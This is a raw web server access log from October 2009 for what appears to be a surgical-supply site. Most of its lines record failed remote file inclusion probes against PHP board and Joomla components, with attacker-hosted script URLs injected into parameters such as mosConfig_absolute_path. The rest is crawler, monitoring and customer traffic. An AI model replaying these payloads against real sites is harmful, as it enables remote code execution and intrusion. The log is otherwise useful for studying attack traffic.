221.143.43.216 - - [11/Oct/2009:23:59:58 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
221.143.43.216 - - [12/Oct/2009:00:00:00 -0400] "GET /logs/access_log.Q109071900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
118.129.166.10 - - [12/Oct/2009:00:00:41 -0400] "GET /logs/error_log.Q109090300//bbs/skin/uks_vote_v3021/write.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:00:00:59 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:00:01:02 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:00:01:07 -0400] "GET /logs/access_log.Q109092000//bbs//skin/ggambo7002_board/write.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
221.143.43.216 - - [12/Oct/2009:00:01:18 -0400] "GET /logs/access_log.Q109072700//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:00:01:21 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:00:01:21 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:00:01:21 -0400] "GET /logs/access_log.Q109080200/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
189.47.0.53 - - [12/Oct/2009:00:01:23 -0400] "GET /logs/access_log.Q109091200/library/lib.php?root=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.825"
189.47.0.53 - - [12/Oct/2009:00:01:23 -0400] "GET /library/lib.php?root=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.825"
189.47.0.53 - - [12/Oct/2009:00:01:23 -0400] "GET /logs/library/lib.php?root=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.825"
189.47.0.53 - - [12/Oct/2009:00:01:23 -0400] "GET /logs/error_log.Q109091200/library/lib.php?root=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.825"
119.63.193.55 - - [12/Oct/2009:00:01:44 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
121.101.214.54 - - [12/Oct/2009:00:02:14 -0400] "GET /logs/access_log.Q109051800%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hit168.net//yunwangodr/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:02:14 -0400] "GET ///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hit168.net//yunwangodr/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:02:15 -0400] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hit168.net//yunwangodr/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:00:02:16 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:00:02:16 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:00:02:16 -0400] "GET /logs/access_log.Q109071300//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:00:02:45 -0400] "GET /logs/access_log.Q109061200//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:02:58 -0400] "GET /logs/access_log.Q109081500%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hit168.net//yunwangodr/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:03:18 -0400] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hit168.net//yunwangodr/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:03:18 -0400] "GET ///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hit168.net//yunwangodr/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:03:18 -0400] "GET /logs/access_log.Q109051800///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hit168.net//yunwangodr/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:00:04:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.193.15.3 - - [12/Oct/2009:00:05:33 -0400] "GET /logs/access_log.Q109052400%20%20/public%A7includes/pub%A7blocks/activecontent.php?vsDragonRootPath=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:05:33 -0400] "GET ///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hit168.net//yunwangodr/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:05:33 -0400] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hit168.net//yunwangodr/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:05:33 -0400] "GET /logs/access_log.Q109071100///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hit168.net//yunwangodr/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:05:54 -0400] "GET /logs/access_log.Q109081500///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hit168.net//yunwangodr/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:00:06:22 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:00:06:22 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:00:06:22 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.249.68.226 - - [12/Oct/2009:00:06:52 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.226 - - [12/Oct/2009:00:06:52 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0109C2411F29E90005D806K+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.226 - - [12/Oct/2009:00:07:02 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0109C2411ED9E90002D806K+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.47.71.89 - - [12/Oct/2009:00:07:03 -0400] "GET /logs/access_log.Q109072500//bbs//skin/ggambo7002_board/write.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.249.68.226 - - [12/Oct/2009:00:07:12 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L30734A372CF8F600714901W+WSEQ(S0060):1+OUITEM(A0200):04948201 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.91 - - [12/Oct/2009:00:07:13 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0109C2411EF9290005D806K+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.226 - - [12/Oct/2009:00:07:24 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0109C2411F4939000CD806K+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
61.100.5.136 - - [12/Oct/2009:00:08:10 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:00:08:18 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:00:08:18 -0400] "GET /logs/access_log.Q109092000//bbs//skin/ggambo7002_board/write.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.234.21.178 - - [12/Oct/2009:00:08:49 -0400] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.234.21.178 - - [12/Oct/2009:00:08:49 -0400] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.234.21.178 - - [12/Oct/2009:00:08:49 -0400] "GET /logs/access_log.Q109072200///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.234.21.178 - - [12/Oct/2009:00:08:49 -0400] "GET /logs/access_log.Q109072200///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.234.21.178 - - [12/Oct/2009:00:08:49 -0400] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.234.21.178 - - [12/Oct/2009:00:08:49 -0400] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.234.21.178 - - [12/Oct/2009:00:09:04 -0400] "GET /logs/access_log.Q109081400///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:00:09:06 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.234.21.178 - - [12/Oct/2009:00:09:09 -0400] "GET /logs/access_log.Q109081400///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:00:09:17 -0400] "GET /logs/access_log.Q109072500//bbs//skin/ggambo7002_board/write.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:00:09:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.101.214.54 - - [12/Oct/2009:00:10:16 -0400] "GET /logs/access_log.Q109061600%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:10:16 -0400] "GET /logs/error_log.Q109071100%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:10:16 -0400] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:10:16 -0400] "GET ///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:10:59 -0400] "GET /logs/error_log.Q109081500%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:11:00 -0400] "GET /logs/access_log.Q109051800%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:11:00 -0400] "GET /logs/error_log.Q109051800%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:11:08 -0400] "GET /logs/access_log.Q109081500%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
72.30.81.156 - - [12/Oct/2009:00:11:40 -0400] "GET /logs/error_log.Q109061200 HTTP/1.0" 200 3584078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
119.63.199.61 - - [12/Oct/2009:00:11:56 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
121.101.214.54 - - [12/Oct/2009:00:11:56 -0400] "GET /logs/access_log.Q109092200%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
72.30.81.156 - - [12/Oct/2009:00:11:45 -0400] "GET /logs/error_log.Q109061200 HTTP/1.0" 200 3584078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.101.214.54 - - [12/Oct/2009:00:12:37 -0400] "GET /logs/error_log.Q109081300%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:12:58 -0400] "GET /logs/access_log.Q109081300%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:13:33 -0400] "GET /logs/access_log.Q109070800%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:14:49 -0400] "GET /logs/error_log.Q109070800%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:00:14:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.101.214.54 - - [12/Oct/2009:00:15:05 -0400] "GET /logs/error_log.Q109091600%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:00:15:05 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:00:15:18 -0400] "GET /logs/access_log.Q109072500//bbs//skin/ggambo7002_board/write.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:15:25 -0400] "GET /logs/error_log.Q109060100%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:15:25 -0400] "GET /logs/access_log.Q109060100%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
72.30.81.156 - - [12/Oct/2009:00:16:25 -0400] "GET /logs/error_log.Q109080400 HTTP/1.0" 200 3126375 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.101.214.54 - - [12/Oct/2009:00:16:41 -0400] "GET /logs/error_log.Q109061900%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:16:41 -0400] "GET /logs/access_log.Q109100600%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
121.101.214.54 - - [12/Oct/2009:00:16:41 -0400] "GET /logs/access_log.Q109091600%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
72.30.81.156 - - [12/Oct/2009:00:16:25 -0400] "GET /logs/error_log.Q109080400 HTTP/1.0" 200 3126375 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.181.7.66 - - [12/Oct/2009:00:17:00 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.68.226 - - [12/Oct/2009:00:17:24 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0109C2411F79790007D806K+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.101.214.54 - - [12/Oct/2009:00:17:39 -0400] "GET /logs/access_log.Q109070900%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
218.234.21.178 - - [12/Oct/2009:00:18:06 -0400] "GET /logs/access_log.Q109081400%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.234.21.178 - - [12/Oct/2009:00:18:18 -0400] "GET /logs/access_log.Q109072200%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.220.127.215 - - [12/Oct/2009:00:18:26 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:18:26 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
218.234.21.178 - - [12/Oct/2009:00:18:32 -0400] "GET /logs/access_log.Q109081400%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.220.127.215 - - [12/Oct/2009:00:19:03 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02 HTTP/1.1" 200 53467 "http://www.acesurgical.com/conform.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:04 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:04 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:04 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:04 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:04 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:04 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:04 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:04 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:04 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
